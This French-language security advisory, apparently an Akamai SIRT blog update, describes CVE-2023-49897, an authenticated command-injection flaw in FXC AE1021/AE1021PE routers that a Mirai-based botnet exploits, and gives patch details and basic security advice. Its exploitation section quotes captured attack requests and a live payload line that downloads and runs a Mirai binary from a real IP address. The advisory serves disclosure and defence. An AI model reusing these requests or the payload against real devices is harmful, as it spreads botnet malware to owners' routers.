Vulnérabilité activement exploitée dans les routeurs FXC : corrigée, correctifs disponibles
Cet article de blog est une mise à jour d'un article précédent de l'équipe SIRT sur la campagne d'InfectedSlurs.
Synthèse
L'équipe SIRT (Security Intelligence Response Team) d'Akamai a émis une mise à jour de la série de conseils sur InfectedSlurs, maintenant que l'un des fournisseurs concernés a publié des versions de micrologiciel corrigées ainsi que des instructions.
Cette vulnérabilité a reçu l'ID CVE CVE-2023-49897 avec un score CVSS v3 de 8,0.
Parmi les routeurs concernés figurent les routeurs muraux Future X Communications (FXC) AE1021 et AE1021PE, exécutant les versions 2.0.9 et antérieures du micrologiciel.
Les charges utiles malveillantes capturées « in the wild » installent un logiciel malveillant basé sur Mirai, avec l'intention de créer un botnet DDoS (déni de service distribué) .
Nous avons fourni une longue liste d'indicateurs de compromission (IOC), de règles Snort et de règles YARA dans la recherche originale, pour aider à identifier ces tentatives d'exploitation « in the wild » et possibles infections actives sur les réseaux de défenseurs.
À savoir
Dans le cadre de la découverte d'InfectedSlurs, l'équipe SIRT a identifié une vulnérabilité dans les routeurs muraux FXC AE1021 et AE1021PE qui est activement exploitée « in the wild ». Ce terminal est décrit comme un routeur LAN sans fil avec prise, conçu pour les hôtels et les résidences. Il est fabriqué au Japon par FXC. Cette vulnérabilité a reçu l'ID CVE CVE-2023-49897 avec un score CVSS v3 de 8,0.
Cette vulnérabilité permet à un attaquant authentifié de réaliser une injection de commande du système d'exploitation avec une charge utile fournie via une requête POST à l'interface de gestion. Dans sa configuration actuelle, il utilise les informations d'identification par défaut du terminal dans les charges utiles capturées.
Les versions de micrologiciel concernées sont les suivantes :
Versions 2.0.9 et antérieures du micrologiciel AE1021PE
Versions 2.0.9 et antérieures du micrologiciel AE1021
Le fournisseur (FXC) a publié une version corrigée du micrologiciel du terminal qui répare la vulnérabilité. Le fournisseur suggère aux propriétaires du terminal une mise à niveau vers la version 2.0.10 du micrologiciel, dès que possible. Ils recommandent également aux propriétaires de réinitialiser les paramètres par défaut du terminal et de modifier le mot de passe par défaut de connexion à l'écran de gestion, au premier démarrage.
Les conseils du fournisseur peuvent être consultés à l'adresse https://www.fxc.jp/news/20231206 Des recommandations publiées par JPCERT peuvent également être consultées à l'adresse https://jvn.jp/en/vu/JVNVU92152057/ (version japonaise : https://jvn.jp/vu/JVNVU92152057/).
Exploitation observée
Les charges utiles identifiées « in the wild » impliquent l'installation d'un logiciel malveillant basé sur Mirai. La campagne développe un botnet destiné à faciliter les attaques DDoS. Le botnet lui-même a été abordé en détail dans notre post initial.
Il est difficile d'estimer combien de terminaux « in the wild » sont susceptibles d'être compromis ou sont activement compromis, car les charges utiles d'attaque capturées reposent sur l'utilisation par les terminaux des informations d'authentification par défaut.
Comme l'attaquant doit être authentifié, deux interactions uniques générées par l'attaquant ont été observées. Nous pensons que la première de ces interactions est simplement une tentative d'utilisation de l'empreinte digitale. L'interaction cible l'URL de point de terminaison /cgi-bin/login.apply en utilisant les informations d'identification par défaut (Figure 1).
URL: /cgi-bin/login.apply
Cookie: cookieno=489646; username=[redacted]; password=[redacted]
User-Agent: Go-http-client/1.1
POST BODY:
username_input=[redacted]&password_input=. [redacted]&lang=ja_JP&hashstr=202310281340&username=[redacted]&password=[redacted]
Fig. 1 : tentative d'authentification du routeur mural FXC avec prise
Si l'authentification réussit, une charge utile d'exploitation est fournie à l'URL de point de terminaison /cgi-bin/action environ trois secondes plus tard (Figure 2).
URL:/cgi-bin/action
Cookie: username=[redacted]; password=[redacted]; cookieno=489646
User-Agent: Go-http-client/1.1
POST BODY:
page_suc=i_system_reboot.htm&system.general.datetime=&ntp.general.hostname=[RCE]&ntp.general.dst=0&ntp.general.dst.adjust=0&system.general.timezone=09:00&system.general.tzname=Tokyo&ntp.general.enable=1
Figure 2 : tentative d'exploitation du routeur mural FXC avec prise
Les charges utiles d'exploitation brutes capturées « in the wild » tentent d'exploiter la vulnérabilité d'injection de commandes du système d'exploitation pour distribuer une variante compilée MIPS de Mirai (Figure 3).
cd /tmp; rm -rf mips; wget http://45.142.182.96/spl/mips; chmod 777 mips; ./mips accessedge
Figure 3 : Charges utiles d'exécution de code à distance observées « in the wild »
Dans notre publication initiale,l'équipe SIRT d'Akamai a fourni une liste complète d'IOC, de règles Snort et de règles YARA pour aider à identifier ces tentatives d'exploitation « in the wild » et les infections actives possibles sur les réseaux défenseurs.
Conclusion
Les campagnes ciblées sur l'Internet des objets (IoT) donnent lieu à d'innombrables cas dans lesquels les terminaux grand public sont involontairement impliqués dans un certain nombre d'efforts malveillants. Les botnets d'attaques DDoS et les systèmes de minage de cryptomonnaie ne sont que quelques-uns des résultats potentiels qui peuvent se produire complètement à l'insu de l'internaute dont le terminal est touché. Dans certains cas, l'utilisateur peut même ne pas savoir que les informations d'identification peuvent être modifiées sur ces terminaux.
Cette révélation souligne la nécessité d'une sensibilisation et d'une formation accrues concernant les meilleures pratiques de l'IoT et les risques associés pour l'internaute moyen. Le besoin de sensibilisation n'est pas exclusif aux utilisateurs : il s'applique également aux fabricants de ces terminaux « à configurer puis à oublier ».
Importance des pratiques de sécurité de base
Les bases comptent. Ces observations soulignent une fois de plus l'importance des meilleures pratiques en matière de sécurité de base, telles que la modification des mots de passe par défaut sur les terminaux, lors de la configuration initiale. Elles mettent également en évidence l'importance de mettre en œuvre des protocoles de sécurité proactifs à long terme encore plus solides, comme assurer une mise à jour cohérente des systèmes pour se protéger contre les attaques potentielles et vérifier de temps à autres les systèmes/terminaux, surtout s'ils présentent un comportement étrange.
Restez à l'écoute
Le groupe Security Intelligence d'Akamai continuera à surveiller ces menaces et à les signaler afin de sensibiliser nos clients et la communauté en général. Pour accéder à d'autres recherches, suivez-nous sur X(ex-Twitter) pour connaître les dernières actualités.
L'équipe SIRT d'Akamai souhaite prendre un moment pour remercier CISA, US-CERT, JPCERT et FXC pour leur assistance dans les efforts de communication, de coordination, d'identification, de correction et de divulgation.
Nous tenons également à remercier Ryu Kuki, Takayuki Sasakiet Katsunari Yoshioka, de l'Université nationale de Yokohama pour leur travail assidu. Bien que nous n'ayons pas pu travailler directement avec eux, il a été porté à notre attention qu'ils avaient signalé la même vulnérabilité auprès de JPCERT et de FXC, à peu près en même temps que l'émission de nos propres rapports. C'est toujours formidable de trouver d'autres défenseurs qui jouent un rôle actif pour qu'Internet soit un endroit meilleur et plus sûr pour tout le monde.
